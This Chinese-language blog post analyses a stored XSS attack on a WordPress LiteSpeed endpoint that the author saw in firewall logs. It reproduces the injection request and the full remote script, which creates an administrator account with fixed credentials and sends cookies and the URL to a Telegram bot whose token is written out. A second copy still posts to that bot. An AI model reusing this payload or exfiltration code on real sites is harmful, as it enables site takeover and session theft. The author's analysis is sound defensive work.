起因

在昨天查看雷池防火墙拦截记录的时候发现了以下记录

感觉这个XSS还是比较有意思，研究一下。

请求方式

通过POST，请求WP-JSON接口，并放入XSS数据

POST /wp-json/litespeed/v1/cdn_status

请求结构体如下

success=True
result[msg]=memek
result[summary]=Jembut
result[nameservers]=<script type=text/javascript src=https://wordpress.zzna.ru/css.js></script>

其中nameservers部分显然含有XSS注入

查看对应内容

检查一下这个注入的内容，打开一下即可查看，代码如下，大意是通过重置Nonce的方法来创建新用户，若成功，则发送到telegram机器人。

切勿在服务器上运行这段代码

JavaScript

const start = async () => {
    try {
        // Fetch REST nonce from the specified URL
        const nonceResponse = await fetch('/wp-admin/admin-ajax.php?action=rest-nonce');
 
        // Check if the response is successful and retrieve the text
        const nonce = nonceResponse.ok ? await nonceResponse.text() : null;
 
        // If nonce is available, proceed to create a new WordPress user
        if (nonce) {
            const userResponse = await fetch('/wp-json/wp/v2/users', {
                method: 'POST',
                headers: {
                    'X-Wp-Nonce': nonce,
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({
                    username: 'admin@zzna.ru',
                    password: 'dacai@123',
                    roles: ['administrator'],
                    email: 'admin@zzna.ru'
                })
            });
 
            // Check if the user creation was successful or encountered a server error
            if (userResponse.ok || userResponse.status === 500) {
                // Get cookies
                const cookies = document.cookie;
 
                // Notify about the new user creation via Telegram including cookies
                await fetch('https://api.telegram.org/bot6898182997:AAGUIFwP-BsBjDpzscyJ7pLHbiUS_Cq5lNI/sendMessage', {
                    method: 'POST',
                    body: JSON.stringify({
                        chat_id: '686930213',
                        text: `URL: ${document.URL}\nNew User Created!\nCookies: ${cookies}`
                    }),
                    headers: {
                        'Content-Type': 'application/json'
                    }
                });
            }
        }
    } catch (error) {
        // Handle any errors during the process
        console.error(error);
        return false;
    }
};
 
// Initiate the process
start();

进行安全提醒

下面这段代码去除了危险内容，提醒这位攻击者放弃攻击（会包含网站域名发送，切勿轻易尝试）

JavaScript

<script>
    const start = async () => {
    try {
        // Fetch REST nonce from the specified URL
        // Check if the response is successful and retrieve the text
        const nonce = true;
        // If nonce is available, proceed to create a new WordPress user
        if (nonce) {
            // Check if the user creation was successful or encountered a server error
            if (true) {
                // Get cookies
                const cookies = 'don\'t do that';
 
                // Notify about the new user creation via Telegram including cookies
                await fetch('https://api.telegram.org/bot6898182997:AAGUIFwP-BsBjDpzscyJ7pLHbiUS_Cq5lNI/sendMessage', {
                    method: 'POST',
                    body: JSON.stringify({
                        chat_id: '686930213',
                        text: `URL: ${document.URL}\nNew User Created!\nCookies: ${cookies}`
                    }),
                    headers: {
                        'Content-Type': 'application/json'
                    }
                });
            }
        }
    } catch (error) {
        // Handle any errors during the process
        console.error(error);
        return false;
    }
};
 
// Initiate the process
start();
</script>